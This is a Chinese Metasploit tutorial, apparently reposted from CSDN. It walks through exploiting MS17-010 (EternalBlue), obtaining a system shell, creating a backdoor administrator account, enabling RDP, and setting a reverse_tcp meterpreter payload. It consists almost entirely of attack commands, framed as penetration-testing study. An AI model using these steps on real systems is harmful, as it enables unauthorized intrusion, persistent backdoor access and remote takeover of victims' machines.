ICode9

精准搜索请尝试: 精确搜索
首页 > 编程语言> 文章详细

Metasploit framework

2021-01-27 15:32:03  阅读:295  来源: 互联网

标签:Metasploit shell 命令 010 framework set ms17 模块


工具:the Metasploit framework
1.启动命令:msfconsole
一些参数解释:
(1)exploit:是代表利用漏洞进行攻击动作的模块
(2)auciliary:负责执行信息收集、扫描、嗅探
(3)post:后渗透模块
2.搜索命令
(1)例如:search ms17-010(搜索ms17-010漏洞模块)
查看是否存在这个漏洞
命令:set rhosts 目标主机IP地址
3.以ms17-010的第三个模块为例(永恒之蓝)
命令:use 3(利用永恒之蓝模块)
命令:info(查看详细信息)
命令:show options(查看配置的详细信息)
4.set lhost 攻击机IP地址(kali攻击机IP地址)
配置完成以后使用run命令运行
5.攻击成功以后,得到shell视图,完成以后查看当前shell权限
命令:getuid    (最高权限是system)
6.输入shell可以获得对方CMD的命令行shell
7.输入chcp 65001 修改编码格式为UTF-8编码
8.在目标主机上新建一个账户
命令:net user test2 123456 /add
9.将新建账户添加至管理员组
net localgroup administrators test2  /add
10.退出当前shell (exit)
11.开启对方的3389服务(远程桌面服务)
命令:run post/windows/manage/enable_rdp
12.目标连接
(1)徽标键(win)+R打开运行窗口
(2)输入mstsc命令打开连接窗口
(3)输入创建的账户和密码,进行登录


命令总结:
1.msfconsole:启动msf
2.search ms17-010:搜索某个漏洞模块(如MS17-010)
3.use+模块ID:使用这个模块,并进入这个模块视图下
4.info:查看该模块的相关介绍信息
5.set rhosts/lhost+IP:配置参数的值,其中rhosts代表目标IP,Lhost代表本机IP
6.run/exploit:运行模块
7.set payload windows/x64/meterpreter/reverse_tcp:
设定payload为meterpreter这种高级的shell,并设定为rverse_tcp反弹shell
8.show options:查看配置的参数

标签:Metasploit,shell,命令,010,framework,set,ms17,模块
来源: https://blog.csdn.net/qq_49091880/article/details/113249766

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有